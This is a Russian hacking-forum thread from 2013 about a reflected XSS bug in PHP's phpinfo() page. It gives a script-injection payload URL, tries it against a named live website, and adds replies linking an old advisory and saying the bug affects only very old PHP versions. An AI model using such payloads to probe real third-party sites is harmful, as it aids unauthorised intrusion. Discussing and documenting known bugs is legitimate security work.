Xss в phpinfo().

Discussion in 'Уязвимости' started by psihoz26, 4 Nov 2013.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    Не нашел про данную уязвимoсть ничего на форуме и поэтому решил запостить.

    Формат уязвимой ссылки:
    Code:
    httр://site.com/phpinfo.php?a[]=<script>alert('xss')<script>

    Пример:
    Code:
    http://www.infineform.com/info.php?a[]=<script>alert('xss')</script>
     
    1 person likes this.
  2. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    279
    Likes Received:
    117
    Reputations:
    26
    Я на хостинге сайтов находил phpinfo надо проверить на XSS )
     
  3. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Это старая бага:
    http://www.php-security.org/MOPB/MOPB-08-2007.html
    http://www.exploit-db.com/exploits/3405/

    На том сайте что ты скинул для примера
    Code:
    Build Date 	Sep 28 2005 12:31:10
    Версия правда 5.0.4, а пишут что только четвёртая ветка уязвима.

    Короче будет работать только на очень старых версиях PHP.
     
    2 people like this.
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    В четвертых версиях еще запатчили. Странно, почему на 5.0.4 вообще работает. Может не в четвертой, а в ранних версиях пятой.
     
  5. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    315
    Likes Received:
    63
    Reputations:
    66
    Мда.Какая глобальная и "новая" уязвимость.
     
  6. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    Я нигде не писал что уязвимость новая и что я её лично нашёл.
    Не все же знали про эту уязвимость и на форуме не было упоминания её.
    Кому надо взяли на заметку.
     
Loading...